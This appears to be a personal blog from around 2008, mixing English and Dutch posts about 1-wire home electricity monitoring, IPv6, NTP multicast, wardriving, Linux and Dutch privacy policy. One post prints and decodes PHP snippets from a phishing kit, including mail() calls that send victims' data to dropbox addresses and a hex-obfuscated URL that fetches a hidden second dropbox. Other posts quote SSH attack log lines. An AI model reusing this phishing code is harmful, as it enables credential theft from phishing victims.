No local source for a photodiode which is sensitive to visible light. Time to shop on-line for a photodiode which is sensitive to red light, which will be listed as 650 nm, is directional and can deal with the amount of red light from the electricity meter LED. Reading specsheets for photodiodes is also new to me. I found a webpage with lots of explanations about LEDs and calculations. But, ordering a component on-line which costs less than a euro is a bit silly, with probably a lot more costs in shipping and handling. Conrad just charges extra for too small orders.

I finished soldering the Velleman MK120 receiver I will use for detecting the lightpulses from the electricity meter for the one wire electricity measuring project. I think that is the first soldering of a circuit board since somewhere around my electronics education which finished in 1989 and I did it right! The circuit works as designed: it needs a strong infrared signal to not send out a signal via led and buzzer. I did not solder the buzzer because eventually the signal needs to go into the 1-wire counter and buzzing sounds from the cupboard under the stairs might get irritating fast. After checking whether the circuit board worked as designed I swapped the inputs on the comparator like in the 1-wire electricity monitoring design by Jon00. I did not cut traces and solder wires, I used the IC holder to set up 2 crossed wires to the pins of the IC.

In testing I found that the L-53P3C photodiode is very good at receiving infrared, but the red led in our electricity meter does not emit enough infrared light to trigger the circuit. I think I'll need to find a different photodiode which is more sensitive for visible (or just red) light.

At work we are experimenting with multicast but it stopped working sometime during my holiday. Multicast is quite new for our network management so it was confusing what was wrong. Lots of searching and debugging later we found a fellow Surfnet customer was announcing a rendezvous-point which wasn't going to do the pim rendezvous protocol for us. So we configured the multicast routers to fix on the Surfnet rendezvous point address (145.145.145.145). Surfnet now filters the auto-rp group to avoid problems like these in the future. We learned a lot about multicast debugging in the process.
Just in time: we hope to follow the olympic games in HD quality via multicast streams.

New (for me): a distributed ssh attack. All different IPs trying to log in as root. Which I disable on systems, so it all won't work. From the logs:

Jul 10 02:02:06 idefix sshd[36927]: Failed unknown for illegal user root from 198.105.8.56 port 35529 ssh2
Jul 10 02:21:34 idefix sshd[37295]: Failed unknown for illegal user root from 216.65.214.88 port 52682 ssh2
Jul 10 02:41:58 idefix sshd[37692]: Failed unknown for illegal user root from 67.59.90.96 port 47163 ssh2
Jul 10 03:02:18 idefix sshd[39260]: Failed unknown for illegal user root from 139.29.176.237 port 57930 ssh2
Jul 10 03:22:56 idefix sshd[39933]: Failed unknown for illegal user root from 75.53.25.73 port 48376 ssh2

Seems like a nice distributed attack to circumvent tools that check for repeated attempts from one IP or with a too high rate. But, I still get the logcheck e-mail to point at and laugh, distributed ssh root attempts log. Probably all open proxies or part of some botnet.

Een van mijn e-mail adressen is een adres wat makkelijk bedacht wordt door mensen voor webformulieren. Als gevolg hier van krijg ik regelmatig e-mail van websites die bang zijn dat ze potentiele klanten kwijtraken als ze de ingevoerde e-mail adressen eerst verifieren voor ze hun 'nieuwsbrieven' en dergelijke sturen. Als ik dus in de verkeerde bui ben gaan die mails gelijk door naar het spamklacht.nl klachtenformulier en spamcop.net en als ik in een goeie bui ben probeer ik een keer iets als een 'unsubscribe' link of corrigeer het e-mail adres op de website naar iets als info@afzenderdomain.
Vandaag een bijzondere verdwaalde e-mail:

Geachte mevrouw Slotboom,
Hartelijk dank voor het inzenden van uw pasfoto voor uw OV-chipkaart.
U ontvangt uw nieuwe Voordeelurenabonnement op de OV-chipkaart..

Ik heb alleen zeker geen voordeelurenabonnement meer: juist vanwege de invoering van de OV-chipkaart en het absoluut niet goed nadenken over privacy daarbij heb ik mijn voordeelurenabonnement opgezegd. Maar blijkbaar wil de NS nog eens extra aantonen dat ze slecht nadenken over privacy en accepteert dus elk willekeurig e-mail adres ergens in het invoeren van de gegevens. De 'mijn gegevens' link uit het mailtje geeft ook de gegevens zoals die bij de NS geregistreerd staan, dus ik kan nu van deze mevrouw Slotboom adres, geboortedatum en telefoonnummer zien.
Uit de NS privacy policy waarnaar verwezen wordt op de pagina met gegevens:

Om uw persoonlijke gegevens optimaal te beschermen tegen onbevoegde toegang of onbevoegd gebruik, wordt binnen NS steeds de nieuwste beveiligingstechnologie toegepast.

Nou, blijkbaar is die nieuwste beveiligingstechnologie in dit geval een unieke url via een third-party e-mail response bedrijf die gestuurd wordt aan een e-mail adres waarvan niet geverifieerd is dat het klopt met de persoon waar het over gaat.

My 1-wire projects also got their own page. And I ordered the parts for the new project. And a few other bits, including more temperature sensors. So, with some soldering time I'll be monitoring electricity usage soon.

Wardriving results 10 June - 30 July: 1615 new networks with GPS locations. Not much happening due to the holiday because I'm not taking the wardriving box on a cycling holiday.

The apple tree in our back garden is so loaded with apples the branches are bending under the weight. Not breaking (yet). Looks like a lot of apples will be available in a few weeks.

The apple-tree in our garden heavy with apples.

I decided to start monitoring the electricity usage in the house. Using 1-wire sounds the most logical to me as I am already using that to monitor temperatures. I found a description by Jon00 using a MK120 Velleman Kit which sounds quite compatible with my level of electronics knowledge and my budget. So I went to the local electronics shop, Radio Centrum and bought the Velleman MK120. I asked about a 1-wire counter but they don't sell 1-wire equipment (yet?). Well, a counter is something I can order from Hobby boards. Probably together with some other 1-wire stuff to make it an interesting order.

Hot, hot: temperature under the roof (sensor 2)

Jul 27 18:43:23 Sensor 2 C: 35.62

And we're back from vacation! We cycled around Denmark for almost three weeks. A total of 1080 Kilometers on our recumbents from København to Århus along a number of the Danish islands and Jylland. We used trains from Utrecht to København and from Århus to København back to Utrecht. The intercitynightline is nice for getting from Utrecht to København in one go. It just takes a big detour of Germany. The intercitynightline and the Danish trains have no problems at all with recumbents. We saw a lot in Denmark, including a visit to Legoland in Billund and the Elmuseet. The weather was ok although we had a number of rainy days. We stayed in hostels, bed and breakfast and a few hotels.

More ntp fun: I now have multicast ntp time working and documented. With the listed ntp key clients can use the multicasted network time from ntp.cs.uu.nl. The outgoing timestamps look like this in tcpdump:

14:45:06.821419 IP (tos 0x0, ttl  30, id 6195, offset 0, flags [none], proto 17, length: 96) 131.211.84.189.ntp > 224.0.1.1.ntp: NTPv4, length 68
        Broadcast, Leap indicator:  (0), Stratum 2, poll 6s, precision -19
        Root Delay: 0.000000, Root dispersion: 0.001724, Reference-ID: 127.127.22.0
          Reference Timestamp:  3424077852.817587474 (2008/07/03 14:44:12)
          Originator Timestamp: 0.000000000
          Receive Timestamp:    0.000000000
          Transmit Timestamp:   3424077906.819248263 (2008/07/03 14:45:06)
            Originator - Receive Timestamp:  0.000000000
            Originator - Transmit Timestamp: 3424077906.819248263 (2008/07/03 14:45:06)

I also see multicasted time from 192.36.143.151 (time2.stupi.se) but I can't find a key for it.

A new peak in ntpd traffic on ntp.cs.uu.nl : 1986 packets/second. From a very limited peek at the IP numbers it seems the 'friends' at turkish telecom were quite interested in the correct time.

Bericht in het Algemeen Dagblad vandaag: Slimme energiemeter meet privégegevens [link verlopen]. Precies de reden waarom ik veel statistieken thuis afscherm en alleen sensors laat zien die minimaal verband hebben met aanwezigheid van personen. Aan het wireless verkeer is veel nauwkeuriger te zien of er mensen thuis zijn, die gegevens zijn dus niet publiek en worden niet buiten het huis opgeslagen. Ik wil pas een 'slimme' energiemeter als ik deze zelf kan uitlezen met rrdtool en ik zeker weet dat de gegevens niet buitenshuis op te vragen zijn.

Daarnaast is er nog de vraag hoe deze 'slimme' energiemeter gaat communiceren met de leverancier. De kans is ruim aanwezig dat dit via PLC (powerline communications) gaat, want er ligt toch al een (electriciteits)draad tussen de meter en de netbeheerder. PLC kan storingen veroorzaken voor radio-amateurs, deze houden de ontwikkeling rond de 'slimme' energiemeter dus ook scherp in de gaten.

I received a new laptop from work and started writing down the experiences just like with the previous one: The Dell Latitude D630 laptop and linux. So far nothing shocking: I chose Ubuntu as linux distro.

Jaaa! Ik heb een echt y2k probleem gewonnen:

I moved PostgreSQL on the home server gosper from an install I compiled myself ages ago to the debian-maintained package. As a side-effect the data moved from /scratch to /var which is on a different physical disk. Now the disk with /scratch and /boot has no reason to stay awake all the time and it spins down, saving another bit of power. Quite visible in the UPS stats. I guess splitting OS and lesser-used data disks in a home server can save a bit of power. The assorted sensors at home overview shows disk hda sleeping a lot more.
As a side effect the postgresql data is now also included in the backups. The database at home went from a few tables with copies of data from webprojects I was developing to data actually in use. Time for backups.

For the next meeting of the hcc pc!gg netwerkgroep I wanted wired Internet access. But the location where it will be is so advanced it only has wireless Internet access. Time for a fix.

First option was a Linksys WAP54G (borrowed from work). The page in the setup where it can be configured as a wireless client already mentioned that it doesn't want to connect to other brands of networks. Too big a risk that this will not work on location.

Second option was getting a wireless - wired bridge running in Linux. The server I use for experiments with the netwerkgroep has a pci to pcmcia interface and a prism2 based pcmcia wireless card. After a bit of finding sources and getting the hostap drivers working again I set up the bridge and built a test network. First the normal iwconfig commands failed to produce results until I found that the right order is to first ifconfig wlan0 up and then iwconfig wlan0 essid 2marken.

ifconfig wlan0 up
iwconfig wlan0 essid 2marken

As a simple wireless client it works. Now to make it a bridge:

ifconfig wlan0 0 up
ifconfig eth1 0 up
brctl addbr br0
brctl addif br0 eth1
brctl addif br0 wlan0

Disabling ip on wlan0 and eth1 to take them out of normal ip routing and traffic. The bridge was working, the bridging machine was able to see the wireless network and get an IP via DHCP on the bridge interface using dhclient br0. A client machine connected to the wired connection of the bridge did not get an IP. With lots of tcpdumps running it showed that the bridge did forward the DHCP request out of the wireless interface but it never showed up on the server. Later running of another tcpdump on the same wireless network also showed no packets passing.

The one reason I can think of this happening is spanning tree doing something weird. The main ethernet switch in our house does spanning tree. Configuring that switch to force itself to be the spanning tree root also did not fix things. Or maybe the prism card does not like transmitting ethernet frames with a different source address. The Linux bridging documentation suggests this can be a problem.

Eventually I gave up and just went the standard way of masquerading from eth1 to wlan0 and setting up the standard stuff (dhcp server, nameserver). That does mean double NAT (yuck) but at least it gives connectivity.

I split the pages for the mobile phones I had working with the Dell Latitude C640 laptop into separate pages. Using the phone does not depend on the specific laptop, when the transport works (bluetooth) all systems will look the same, they just need the right software and the phone needs to cooperate. So, new pages:

• Nokia 6150 and Linux
• Nokia 6310i and Linux
• Nokia 6630 and Linux

Also a new laptop is on its way so I'll need to set up a new Linux on a laptop page soon.

Yesterday I upgraded the firmware of the Asus WL-300g accesspoint at home. The first effect was that the settings were completely hosed: I could not log in to the web interface and the wireless network had turned into an open network with SSID 'Broadcom' on a very busy channel. But after finding the manual on the asus web site and resetting the config I had access again to the web interface and I was able to enter my own configuration. So now I use WPA2. The interference problems are still there: putting the laptop on the (metal) garden table makes the wireless signal drop out.

Wardriving results for 30 May - 9 June: 2328 new networks with GPS locations according to WiGLE. Nothing really out of the way, one visit to Nieuwegein scored quite a number of new networks.

The laptop I use can also run Windows XP when it is really necessary (every time this happens most of the time is spent waiting on windows updates). So I enabled IPv6 on Windows XP. IPv6 works nicely. I disabled the 'privacy extensions' directly because I want traceable addresses in use, even with IPv6.

The one application that goes horribly wrong now is the webbrowser Opera. When the laptop is in a non-IPv6 enabled network (like at work) and I visit an IPv6-enabled website like weather.idefix.net with it, it fails horribly: it just shows a 'network error' page after a long timeout. Disabling automatic 6to4 makes the 'network error' page just appear faster. I reported this as an bug with Opera. Other browsers (Internet explorer, Firefox) don't show this error (but I need to test them with IPv6 to make sure they don't avoid it completely).

Nu al komt in onderzoek in Duitsland naar voren dat mensen toch hun gedrag aanpassen aan het feit dat gegevens over hun communicatie opgeslagen worden sinds begin 2008. Bewaarplicht heeft dus wel degelijk invloed, iedereen komt er achter dat hij of zij toch iets te verbergen heeft. Artikel Data Retention Effectively Changes the Behavior of Citizens in Germany (engels, maar ik schrijf over het recht op privacy uit de nederlandse grondwet het liefst in het nederlands). Interresant leesvoer.

En Zweden wil een eigen wet invoeren voor het afluisteren van alle communicatie, waardoor diverse bedrijven hun vestigingen in Zweden willen opheffen en hun niet-Zweedse klanten willen garanderen dat hun data nooit in Zweden kan komen. World+dog ignores Sweden's Draconian wiretap bill (The Register) (engels).

I can't get enough of IPv6. First, geekandpoke comes with a cartoon about the whole IP address shortage problem. And, in searching for information I found a blog Living with IPv6 about the real world of implementing IPv6 in a university network.

Sometimes spammers / scammers are so stupid it is amusing again. I just received several mails with the php-source for the result-collecting and mailing script for the phishing site. Interesting code snippets:

mail("dongmopascal@gmail.com",$subject,$message,$headers);

But, the scammer gets scammed too. Look at this code snippet:

$ar=array("0"=>"m","1"=>"i","2"=>"e","3"=>"r","4"=>"d","5"=>"a","6"=>"0",
"7"=>"0","8"=>"@","9"=>"h","10"=>"o","11"=>"t","12"=>"m","13"=>"a","14"=>"i",
"15"=>"l.es");
$to=$ar['0'].$ar['1'].$ar['2'].$ar['3'].$ar['4'].$ar['5'].$ar['6'].$ar['7'].
$ar['8'].$ar['9'].$ar['10'].$ar['11'].$ar['12'].$ar['13'].$ar['14'].$ar['15'];

mail($to,$subject,$message,$headers);

Takes a bit of decoding, but it seems copies are sent to mierda008@hotmail.es.
The same spammer also mailed a different script with the same function. This script is clear on where to put the dropbox address:

        //This is your email
		$to = "savepam@gmail.com" ; // Write your email

But in the next lines...

/* EnD Configuration */
$victimIP = pack("H*", "687474703a2f2f667265657363616d732e33782e726f2f656d61696c2e706870");
$DetailsIP = file_get_contents($victimIP, "r");
$DetailsIP = pack("H*", $DetailsIP);

$victimip unpacks to http://freescams.3x.ro/email.php so the scammer of the scammer can 'maintain' this and change dropbox if needed. Currently that shows a page which I think says that the page does not exist. The result would be used in the code:

$arr=array($to, $DetailsIP);
foreach ($arr as $to){mail($to, $subj, $msg, $from);}
header("Location: done.html?cmd=_login-run");

You can't trust a good scammer these days, it seems...

Google recently published that they are now available via IPv6. Nice idea.. but for now only available via a separate name: ipv6.google.com. They don't dare take the plunge yet of publishing an AAAA record for www.google.com. That would be really adopting IPv6 and finding those clients that can't deal properly with advertised IPv6 addresses without outside IPv6 connectivity.

I can understand that that change would have major implications. Indeed, clients being unable to reach it, Akamai needing to support it, load balancers to support it. But the announcement skips these important issues about really taking IPv6 into production and just says 'we do something with IPv6 now'. Yes, but you are not integrating it fully yet.

Staples to start selling self-destructing DVDs. Obvious remark: is Mission: Impossible available in this format?

I noticed that the entry for De Bilt, Netherlands at the weather.gladstonefamily.net site had recent weather data. I asked Philip Gladstone where he gets that data and searched around a bit myself. The answer is that this is synop (surface synoptic observations) data. The synop data format is ofcourse very different from the METAR format. Time to find good data sources, write another parser and see what this can do for http://weather.idefix.net/. Probably time to split the whole script that generates the weathermaps in several parts, fetching, parsing and caching data, drawing the resulting data on the map.

Vorige week nogal in het nieuws: Bijna 1700 taps per dag (SpitsNieuws), Nederland tapt meer af dan Verenigde Staten (techzine). Allemaal gebaseerd op een zo vaag mogelijk antwoord van het ministerie van justitie (pdf) waar de nieuwsschrijvers dus prompt eigen conclusies aan hangen. Bijvoorbeeld de conclusie dat het gaat om 'gesprekken per dag' is al overdreven volgens mij. De enige echte gegevens zijn:

In de tweede helft van 2007 is op 12491 telefoonnummers een bevel tot aftappen gegeven door het Openbaar Ministerie. Hiervan betrof het in 84% een tap op een mobiele telefoon en in 16% een tap op een vaste telefoon. In de betreffende periode liepen er dagelijks gemiddeld 1681 taps.

Een tap loopt vast meestal meerdere dagen. Wat er bijvoorbeeld niet in staat is de definitie van tap die hier gebruikt wordt: registratie nummers of ook audio registratie.

De enige dingen die duidelijk zijn: Justitie tapt heel erg veel af. Groenlinks had al recent hierover kamervragen gesteld: GroenLinks eist naleving notificatieplicht telefoontap. Dat worden dus een heleboel notificaties (een slordige 25000 per jaar).

I decided to do the long overdue upgrade from Debian oldstable to stable on the home machine turing. Unlike earlier debian sarge -> etch upgrades even the XFree86 to Xorg upgrade went completely flawless. So I tried some more upgrading and went from a Linux 2.4.35.4 to a Linux 2.6.25.4 kernel. With some rounds of kernel recompiling I got everything working again, including complete acpi support which I never got working with 2.4 kernels. Somewhere around 2.4.32 acpi support just gave lots of kernel events (while this motherboard was still running the home server gosper. Later 2.4 versions just told me the bios was too old for proper acpi support. It's an Asus P3B-F motherboard and google searches indicated that the overload of events is just a known bug. Upgrading the bios did not help and made another problem appear: a shutdown turned into a reboot so I downgraded it again to the version with working shutdown.

This was the first mainboard I bought (in 1999) with working acpi which I once used to scare Henk van de Kamer by just pressing the power button of the pc. Back then you carefully shut down the machine and acpid was brand new. So I'm happy acpi and everything is working again and this is a good reason to put more time into 2.6 kernels and try to get that working on all machines at home.

With 2.6 I ran into a few things I already saw on building it for the wardrivingbox such as the speaker driver being separated (it gets very quiet without it). New to me was that /etc/modules.conf generated by update-modules from modutils is not actually used with 2.6 kernels. The 2.6 version uses files in /etc/modprobe.d/. Copying settings for modules to that directory suddenly made drivers like bttv work again. I also had to give specific settings for the soundblaster card which was autodetected in 2.4. It is an ISA card, so back to good old io=0x220 irq=7 dma=1.

The remaining issue is that the network card does not stay on for wake on lan.

Wardriving results 20 May - 29 May: 2477 new networks with gps locations. With not always the opportunity to bring the wardriving kit along and only small detours through Utrecht this is quite a nice score.

I moved the wireless access point one floor down last evening in hopes of fixing the interference problems at home. So far it seems somewhat more stable. Not perfect.

Ook bij de europese commissie staat IPv6 op de agenda. Dit klopt wel met het beeld dat er ineens subsidies zijn voor dual-stack implementaties.

Wireless at home is giving problems again, even with Mirjams laptop. Probably interference in the completely stuffed 2.4 GHz band. Looking at 802.11a shows not much on offer. Maybe 802.11n with 5 GHz channels can be an option but the affordable 802.11n (draft 2.0) accesspoints for sale all have lots of extra options, like playing 'router' (IPv4 nat) I don't need / want. Netgear seems to have some options but reviews tell me the devices fail easily. Linksys has no real access points other than the wap54g. Cisco has options but only in the expensive range...

I always used ssh-agent to remember keys for me, but lately I started adding a timeout to keys so they don't get remembered indefinitely. Especially on my laptop: what if it gets stolen, the keys are still valid when it comes out of suspend mode. So now I type ssh-add -t 3600 so they are only valid for one hour. But, that is still not ideal as I need to remember that keys might be forgotten when I click on a button or menuitem in fvwm to start a new xterm-with-ssh. Otherwise I may be thrown out directly from the session or asked for a password or passphrase, depending on the SSH security settings. So, fvwm functions to the rescue:
AddToFunc SSHUR4 "I" Exec if ! ssh-add -l > /dev/null; then ssh-add -t 600 .ssh/id_dsa <&- 2>/dev/null ; fi; uxterm -fg black -bg '#e0e0e0' -geom 80x40 -title 'slogin $0' -vb -e ssh -e none $0 &
Now I can just use SSHR4 host.name and it will ask for the ssh passphrase when needed. In an fvwm menu item: AddToMenu Remote-Logins "idefix.net%mini-freebsd.xpm%" SSHR4 idefix.net and in an fvwm button: *FvwmButtons(Title idefix, Icon mini-freebsd.xpm, Action 'SSHUR4 idefix.net' )

It's becoming almost regular.. Group wants Wi-Fi banned from public buildings (KOB.com)

A group in Santa Fe says the city is discriminating against them because they say that they're allergic to the wireless Internet signal. And now they want Wi-Fi banned from public buildings.

Found via Group Wants Wi-Fi Banned, Citing Allergy (slashdot.org)

Looking at the wigle maps for what I think is Santa Fe, NM those 'allergic to wi-fi' probably have to live way out of town to have a normal life during the day. And get rid of that microwave.

Userfriendly did a cartoon about this

I get mail from logcheck daily and the last week or so on one nameserver I keep seeing variations of

May 26 09:37:15 gosper named[895]: denied query from [66.238.93.161].26906 for "." NS/IN
May 26 09:56:16 gosper named[895]: denied query from [211.72.249.201].13819 for "." NS/IN

All the time those 2 IPv4 addresses. With one or two tries it might be a simple attempt to fingerprint my nameservers but at this rate it seems like an attempt at a denial of service attack. Interesting is that the amount of requests is exactly the same for both IPs. 66.238.93.161 and 211.72.249.201 are registered to parts of Asus computers.. where I recently downloaded a bios update in order to fix some acpi problems. Related?

I had a look at the Hurricane electric ipv6 tunnel broker. Quite easy to set up and use .. for an experienced ipv6 tunnel user that is. In literally minutes I had an IPv6 tunnel with a routed /64 up and running. I use that one for a server at work. Now pictures.idefix.net can also be reached via IP version 6. They also offer /48s for people who want to use more than one /64.

Bij het praatje vandaag van Henk van de Kamer over IPv6 en hoe een speedtouch adsl modem daar bij in de weg kan zitten vroeg ik me ineens af of de speedtouch zelf misschien iets met IPv6 zou kunnen. Het protocol (6TO4 oftewel ipv4 protocol 41) staat wel in de default nat regels:

=>:nat bindlist
Application  Proto Port
ESP          esp   1
FTP          tcp   21
[..]
IP6TO4       6to4  1

Maar vervolgens doet de Speedtouch er niks mee behalve het onmogelijk maken voor de aangesloten systemen. In de CLI is niets terug te vinden over een eigen IPv6 implementatie. De suggestie was even gewekt maar het viel tegen in de praktijk. Dus het commando om achter een speedtouch een werkende ipv6 tunnel te krijgen blijft

=>:nat unbind application =IP6TO4 port=1
=>:config save

En de hcc! PCgg netwerkgroep site laat nu zien of een bezoeker van een IPv4 of IPv6 adres komt. En IPv6 is natuurlijk Cool.

Cyclevision op 21 en 22 juni zal een groot evenement worden voor ligfietsers met wedstrijden, zelfbouwprojecten, de nieuwste ontwerpen van nationale en internationale ligfietsfabrikanten en veel kans om kennis te maken met de ligfiets.

Zelf zal ik er niet zijn omdat het samenvalt met een bijeenkomst van de PCgg netwerkgroep.

Ondanks veel verzet toch erdoor gekomen, de bewaarplicht. Nederland wil de gegevens een jaar bewaren. Volkskrant artikel: Gegevens bellen en surfen jaar bewaard. Opmerking om er even uit te lichten:

Onder het motto ‘wie niets te verbergen heeft, heeft niets te vrezen’, wil Teeven (VVD) het liefst dat opsporingsdiensten ‘voor eeuwig’ over zo veel mogelijk gegevens van alle burgers kunnen beschikken. ‘De basisvoorwaarde is dat de overheid te vertrouwen is, en dat is ze’, zei Teeven bij een eerdere gelegenheid.

Helaas: 'de overheid' gaat hier over een hele grote hoeveelheid mensen die niet allemaal even goed te vertrouwen zijn (puur door de grote hoeveelheid). Dit valt volgens mij onder 'de enige manier waarop dit veilig te doen is is door het niet te doen'. En de kosten zijn natuurlijk enorm en diezelfde overheid denkt daar niet voor op te hoeven draaien. Ik ben benieuwd naar de eisen tot schadevergoeding wanneer deze wet teruggedraait wordt.

Op het gebied van privacy kwam ik in de reacties op een opinie-artikel van Simon Hania van xs4all een verwijzing tegen naar http://www.privacyinvasion.eu/. Volgens de reageerder:

Het doel is om het gat dat o.a. is achtergelaten door Bits of Freedom te vullen.

Jammer is alleen dat op de site absoluut de naam / namen van de makers niet zijn terug te vinden, dat de whois registratie semi-anoniem is en dat er enorm gevraagd wordt om registreren door de forum-software. En ik kan geen contact-adres op de site vinden om een reactie naar toe te sturen dat volgens mij de makers een hoop dingen verkeerd aanpakken.
Kortom, die moeten volgens mij een hoop anders doen wil het wat worden.

Hmm.. the wardriving score already scrolled out of the picture at WiGLE since the last mention of the wardriving results. Anyway: the new gps works although I'm limiting my extra recumbent cycling a bit at the moment because my left shoulder is painful. What does score 'new networks' is leaving the setup running at home overnight because there is at least one AMD_IBSS network near my house constantly changing network address and channel (causing lots of interference). Results for ~ 11 May - 19 May: 5501 new networks with gps locations.

I found a really neat description of a project to build an accurate NTP stratum-0 server with the garmin gps 18 lvc.

After a 'complaint' that temperatures were mapped to almost the same shades of green I tried to find a better way to map temperatures to colours for the weather maps on http://weather.idefix.net. What I learned sofar: visualizing temperatures in an easy to understand way is quite hard. The human perception is that blue is cold and red is hot. The current mapping uses that to map temperature to Hue values and use the resulting HSV colour (after conversion to RGB). Adding a legend showing what temperature maps to what colour helps a bit, but with the Netherlands being not too big an area for weather and with usually not much differences in temperature I keep ending up with close shades of the same colour. Interesting problem, and I can't find any published work about this sofar. Lots of research in 3d weather visualization, but no temperature to colour mapping information.

Zaterdag stond in de Volkskrant een opiniestuk van Dhr. Welten, korpschef van de regiopolitie Amsterdam-Amstelland. Hij beweerde dat de politie wel degelijk aan privacy hecht (helaas staat het stuk niet publiek op de volkskrant site). Ik heb een ingezonden brief naar de volkskrant geschreven maar die is niet gepubliceerd. Bij deze publiceer ik hem nu zelf: reactie op Dhr. Welten "politie hecht wel degelijk aan privacy".

Zo, weer betrouwbaar Internet toegang. XS4ALL heeft het over de grootste storing in haar bestaan. Tussen dinsdag 2 uur ('s nachts) en donderdag 10 uur in totaal ongeveer 3 uur werkend ADSL gehad. Het lijkt nu allemaal weer stabiel.

Er is weer een beetje tegengas tegen de politie die alles maar wil registreren en later wil kijken of de gegevens nog bruikbaar zijn. Gisteren stond er een stukje in de Volkskrant Politie registreert alle auto’s bij Zwolle

De kentekens van alle voertuigen die bij Zwolle over de snelwegen A28 en A50 rijden, worden door de regiopolitie IJsselland vastgelegd en drie dagen bewaard.

Het College bescherming persoonsgegevens was niet op de hoogte en noemde de handelwijze van de politie Ijsselland onaanvaardbaar volgens het Volkskrant artikel. Volgens een artikel vandaag Kamer beducht voor autoregistratie

De regiopolitie IJsselland gaat over de schreef door de kentekens van alle voertuigen die over de snelwegen A28 en A50 rijden vast te leggen en te bewaren. Dat stelt een meerderheid van de Tweede Kamer.

Alleen het CDA komt met een volgens mij zwak antwoord:

Het CDA is de enige regeringspartij die daar geen bezwaar tegen heeft. ‘Zie het als uitbreiding van het cameratoezicht’, zegt Kamerlid Ciska Joldersma. ‘Heel belangrijk voor onze veiligheid.’

De duidelijkste opmerking is van CBP-voorzitter Jacob Kohnstamm:

Het is de politie niet gegeven onverdachte burgers te registreren.

En zelfs de politie moet zich aan de wet houden.

Ook Martin Bril had er een mooie opinie over in de Volkskrant maar dat artikel zie ik nog niet on-line staan. De afsluiter:

En waar ik de allergrootste hekel aan heb, is dat ze dan altijd zeggen dat het voor mijn eigen bestwil is. Ik als burger wilde toch al die veiligheid?
Nou nee, weg ermee.

Briljant.

Last weekend was a very long weekend in the Netherlands (I had Wednesday - Monday all off). I took the wardriving setup on some bicycle trips. One trip was specifically through all parts of Ijsselstein which has grown lots since I lived near it. A new record in 'new networks found in one wardrive': 3680 new networks in one go. And.. at the end of Ijsselstein my GPS unit broke. A wire in the cable broke of real close to the housing. So I 'wore out' the Rikaline 6015-X5 GPS I ordered two and a half years ago. So, a new GPS unit is on order: the Holux GR-213. I couldn't find a (trusted) Dutch webshop with the Rikaline 6017 and this one is quite compatible: Comparing documentation from Holux and Rikaline shows that the cable pinout is the same. I guess more is the same: the manuals look quite the same to me in drawings, schematics and headlines. And this new one has a SiRF Star III chipset which should improve results.

Wardriving results 17 April - 1 May: 5238 new networks with GPS locations. I passed the 100000 mark in the WiGLE stats and moved up to number 20. Bringing the setup on some nice recumbent bicycle rides yielded high amounts of new networks.

On Sunday we went on a nice bicycle tour. A bit over 80 kilometers. I brought the wardriving box along and logged the networks found and the gps track. But now I can do something really cool: I can plot the track on a map and put the results on-line thanks to OpenStreetMap. No hassle with 'illegal' map material. This makes this a great moment in open license map data for me. Steps to use an OSM export map in gpsmap (part of kismet). I added the line about the license for the openstreetmap data myself but I can imagine importing data from openstreetmap and correctly naming the source turning into a standard option in gpsmap.

I measured the power usage of the wardriving box. It uses a nice 420 mA. That is very nice, given that the alix.1c board, the wireless card and the gps receiver are all powered from this. In theory, this means the 2.2 Ah battery should be able to power it for over 5 hours.

Vanmorgen op mijn werkaccount spam van ff7.nl. Blijkbaar gericht aan studenten (nee dat ben ik niet meer). Ziet er uit als een idee van studenten voor studenten: je scriptie backuppen naar hun server en vervolgens kans maken die weer op te kunnen halen. Leuk idee, maar jammer van het spammen. Het is wel een internationaal gezelschap: het IP van de server 194.126.173.10 staat volgens whois op naam van een bedrijf Eureka Solutions Sp uit Warschau, Polen maar is in Nederland. Die server eros.e-dentify.nl wijst weer naar een Nederlandse hoster. Abuse afhandeling voor het Poolse bedrijf wordt gedaan door swiftnoc.com en die zitten weer in Engeland.

Martin Bril heeft zich niet helemaal aan mijn voorspelling van gisteren gehouden. Vandaag schrijft hij over de kans op rokjesdag vandaag. Misschien moet Martin Bril eens de Uithof in Utrecht bezoeken waar het volgens mij toch echt al gisteren rokjesdag was.

Weird wi-fi news: A new regulatory agency in Russia has decided every device with Wi-Fi needs registration.

registering a PDA or telephone would take 10 days. Then, only the owner of the device would be licensed to use it. Registering a Wi-Fi hotspot, on the other hand, would be more difficult. Anyone wishing to set up as much as a personal home-network would need to file a complete set of documents, as well as technological certifications.

Sources: The Other Russia: Russian Agency Demands Registration for all Wi-Fi Devices, Wifi net news: Russia Requires Wi-Fi Registration Glenn Fleishman is as always following the wi-fi news, Slashdot: Russia to Require Registration for Wi-Fi Use with the obligatory joke written as wifi-register.su.
To me it sounds like that new regulatory agency claiming its turf. In a way that will annoy a lot of users.

Het is vandaag rokjesdag 2008. Ik voorspel dat morgen bijna alle krantencolumnisten die zich dat kunnen veroorloven dit gaan opschrijven. Vooral Martin Bril zal dit nieuws niet onvermeld laten.
Dat u het even weet.

Wardriving results 28 March - 16 April: 2853 new networks with GPS locations noted at WiGLE. Most amazing was finding 505 new networks without moving the wardriving box one centimeter: the AMD_IBSS networks were showing up again when I had the wardriving box running overnight in the top window.

Found out why firefox didn't talk ipv6 by default: the same resolver bug that I saw before: the resolver prefers ipv4+rfc1918 addresses over ipv6. Fixed with some DNS magic. Some day I'll phase out NATted IPv4 addresses. Until then they are irritating.

Squid has always been my webproxy of choice. Especially at home where I need interesting proxy rules to access certain work-sites via a special route and I like to use the parent proxies of xs4all. But ipv6 support was always a problem in squid until I looked recently and found out that IPv6 support is now default in squid 3-HEAD. So I compiled it and started playing with the access-rules. What I want (ofcourse) is the dancing turtle of kame. I tried to get this by adding an acl ipv6space dst 2000::/3 and using this in specific cache_peer_access deny rules which now works after some trying. I also found that writing the acl for the local network correctly helped a lot: acl localipv6net src 2001:888:1011::/48 works, when I forgot one : at the end it didn't work and denied me access. Now to get firefox to use ipv6 to talk to the proxy...

Our bicycle ride Sunday was really 'dual-use' for me: I logged 218 new networks with GPS locations at WiGLE and I mapped some bicycle paths around Utrecht at openstreetmap.

Found out the hard way: in the innfeed.conf configuration file key bindaddress6 needs its value quoted. So now inn is feeding again.

I tried flashplayer 9 for Linux because flash 7 makes my browser hang often, especially on flash video. With flash 9 I had no audio because flashplayer 9 for linux only supports alsa (and I prefer oss), but a bit of searching found Flash Player:Additional Interface Support for Linux which includes the source of a support library which fixes this problem... for linux users who don't mind compiling a shared library on their own. But now I can watch a youtube video without firefox crashing.

